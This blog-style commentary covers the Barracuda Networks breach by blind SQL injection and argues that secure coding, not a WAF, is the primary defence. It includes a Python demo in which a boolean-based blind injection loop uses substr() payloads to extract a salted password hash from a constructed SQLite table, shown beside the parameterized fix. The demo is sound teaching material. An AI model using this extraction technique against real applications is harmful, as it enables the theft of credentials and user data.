Barracuda Networks is the latest on the list of security vendors/service providers to be compromised. The Malaysian group, “HMSec,” used blind SQL injection to retrieve database contents including emails, CMS logins, and MD5-hashed passwords. A post on barracudalabs.com titled “Learning the Importance of WAF Technology – the Hard Way” explains that, “The Barracuda Web Application Firewall in front of the Barracuda Networks Web site was unintentionally placed in passive monitoring mode and was offline through a maintenance window that started Friday night (April 8) after close of business Pacific time.” It goes on to state that no financial information was stored on this database and that users’ password hashes were salted.
I think the title of that barracudalabs.com post is a little bit off. I think it should read, “Learning the Importance of Secure Software Development – the Hard Way.” This just goes to show that WAFs, while great for certain things, are merely a secondary security control. Secure application development best practices (like passing user input to the database as bound parameters instead of string-concatenating it into the query text) are a primary security control. A WAF can shield certain issues from exploitation before you have a chance to fix them at their source, but you should not rely on the WAF to protect you from severe flaws like SQL injection. After all, what happens when the WAF becomes disabled or gets put into monitor-only mode, as it did here? A WAF that is only monitoring still logs the attack; it just no longer stands between the attacker and the flawed query.
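To make the primary-versus-secondary distinction concrete, here is an added example (my own illustration, not code from the original post or from Barracuda) of the concatenation flaw next to its parameterized fix, with a boolean-based blind injection run against both. It uses Python's standard `sqlite3` module and a constructed two-row `users` table; the table layout, column names, salt and sample accounts are all assumptions made for the demo, not details of the real breach.

```python
import hashlib
import sqlite3

SALT = "s3"  # assumed salt for the constructed sample data

def build_db():
    """Constructed sample database: two users with salted MD5 password hashes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pw_hash TEXT)")
    for uid, email, password in [(1, "admin@example.com", "hunter2"),
                                 (2, "alice@example.com", "correct horse")]:
        pw_hash = hashlib.md5((SALT + password).encode()).hexdigest()
        conn.execute("INSERT INTO users VALUES (?, ?, ?)", (uid, email, pw_hash))
    conn.commit()
    return conn

def lookup_vulnerable(conn, email):
    """The flaw: user input is concatenated into the SQL text, so the attacker
    controls the query. Returns the matching rows (the only thing a blind
    injection needs to observe is whether any row came back)."""
    sql = "SELECT id FROM users WHERE email = '" + email + "'"
    return conn.execute(sql).fetchall()

def lookup_safe(conn, email):
    """The fix: the same query with the input passed as a bound parameter.
    Whatever the attacker types is compared as a literal string value."""
    return conn.execute("SELECT id FROM users WHERE email = ?", (email,)).fetchall()

def blind_extract_hash(conn, lookup, target_email, length=32):
    """Boolean-based blind SQL injection: recover pw_hash one hex digit at a
    time by asking yes/no questions that the application answers only through
    'row found' versus 'no row'. No error messages or data are echoed back."""
    recovered = ""
    for pos in range(1, length + 1):          # SQLite substr() is 1-indexed
        for ch in "0123456789abcdef":
            payload = f"{target_email}' AND substr(pw_hash,{pos},1)='{ch}"
            if lookup(conn, payload):
                recovered += ch
                break
        else:
            # No digit matched: the injection did not take (e.g. parameterized
            # query), so stop rather than loop forever.
            return recovered
    return recovered

def expected_hash(password):
    """The hash the attacker is trying to recover, for checking the demo."""
    return hashlib.md5((SALT + password).encode()).hexdigest()

if __name__ == "__main__":
    db = build_db()
    print("vulnerable:", blind_extract_hash(db, lookup_vulnerable, "admin@example.com"))
    print("expected:  ", expected_hash("hunter2"))
    print("safe:      ", repr(blind_extract_hash(db, lookup_safe, "admin@example.com")))
```

Against `lookup_vulnerable` the loop walks out the full 32-character salted hash with at most 16 requests per character, and nothing in the traffic looks like a "dump"; a WAF in monitoring mode would log the `substr(` pattern and nothing else would happen. Against `lookup_safe` the first round returns no rows at all and the extraction stops with an empty string, regardless of whether a WAF is in front of it.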